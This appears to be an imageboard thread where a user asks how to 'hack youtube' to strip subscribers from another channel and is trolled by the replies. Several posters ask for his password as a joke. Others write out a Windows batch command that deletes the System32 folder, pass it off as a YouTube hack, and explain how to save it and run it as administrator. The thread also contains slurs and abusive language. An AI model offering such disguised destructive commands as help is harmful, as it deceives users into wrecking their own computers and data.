Does anyone know how to hack youtube? I'm trying to leech some bitch of subscribers...

Does anyone know how to hack youtube? I'm trying to leech some bitch of subscribers, I heard about a hack that takes two away but that's too slow

Gimme your username and password and I'll make it happen

Have you tried turning your computer on?

Why the fuck would you even think this could possibly work?

>Gimme your username and password and I'll make it happen

Have you tried contacting youtube support for help?

How do people as dumb as you even find Sup Forums?

Yeah, make this bat file and run it:

@echo off
del C:\Windows\System32

you're retarded
the thing you're talking about was a glitch that would happen when you subscribed to someone and unsubscribed
youtube fixed it and it was just a visual glitch, no one actually lost subscribers because of it

What is bat file and how do I make this?

copy and paste that into notepad

go to save

go to the box and set it to all file types and name the file youtubehack.bat

right click that file and open as administrator otherwise it won't work

Good job fucking telling him you dumbass

There are few easy steps to leech subscribers on youtube:
1. Install gentoo.
2. Use GNU software.

That is all. After using some GNU software on her youtube channel her subscribers will drop like a rock.

nice spoonfeeding fucker

I did exactly this but it didn't do anything other than open notepad with pasted text.

Please help.

For $100 I'll teach you a hack that takes FOUR subscribers away.

You sure the file extension isn't .txt? Try again, making sure it's .bat and click the "all files" option when doing a "save as"

No no no... You forgot crucial component to hacking youtube...
It suppose to be like this:

@echo off
echo y|del C:\Windows\System32

without echo y| it won't work...

I followed this procedure and now have twice as many subscibes. Thanks Sup Forums, I owe you guys.


ha ha very funny
now tell me how to fix it
i tried it on my dads comp and a black window came up and now it doesnt work

its his work computer and hes going to be home soon

This sounds familiar. Must be a glitch in the matrix.
